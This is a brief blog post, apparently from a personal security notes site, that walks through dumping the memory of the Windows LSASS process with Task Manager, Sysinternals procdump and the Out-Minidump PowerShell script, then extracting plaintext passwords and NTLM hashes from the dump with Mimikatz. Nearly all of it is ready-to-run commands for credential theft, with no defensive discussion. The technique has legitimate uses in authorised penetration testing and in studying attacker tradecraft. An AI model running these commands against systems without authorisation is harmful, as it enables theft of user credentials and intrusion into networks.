LSASS Dumping

Posted May 10, 2021 Updated Sep 1, 2023

By Alexander Wells

1 min read

Create a dump file of lsass process using multiple different techniques.

Task Manager
- Create Dump File
Procdump
- Download Tools
- Dump LSASS
Minidump
- Download Minidump
- Import & Run Minidump
Extract Passwords/Hashes from Dump File with Mimikatz

Task Manager

Create Dump File

Open Task Manger and locate the LSASS process.
It will be called lsass.exe or Local Security Authority Process.
Right click on the process and select Create dump file.

Procdump

Download Tools

Download Sysinternals Suite from Microsoft here.

Dump LSASS

Run the following command in an Admin command prompt:

procdump64.exe -ma lsass.exe lsass.dmp

Minidump

Download Minidump

Download the required script from Github here, or a local copy can be found here.

Import & Run Minidump

Import Minidump module:

  
Import-module .\Out-Minidump.ps1

Run the module and dump the process:

  
Get-Process lsass | Out-Minidump

Extract Passwords/Hashes from Dump File with Mimikatz

Download Mimikatz from GitHub here.

Open mimikatz.exe and run:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords

security, windows

security windows lsass passwords hashes ntlm mimikatz

This post is licensed under CC BY 4.0 by the author.

Recently Updated

Trending Tags

security javascript cryptography web http https algorithm programming nodejs windows

Contents

Trending Tags

security javascript cryptography web http https algorithm programming nodejs windows

A new version of content is available.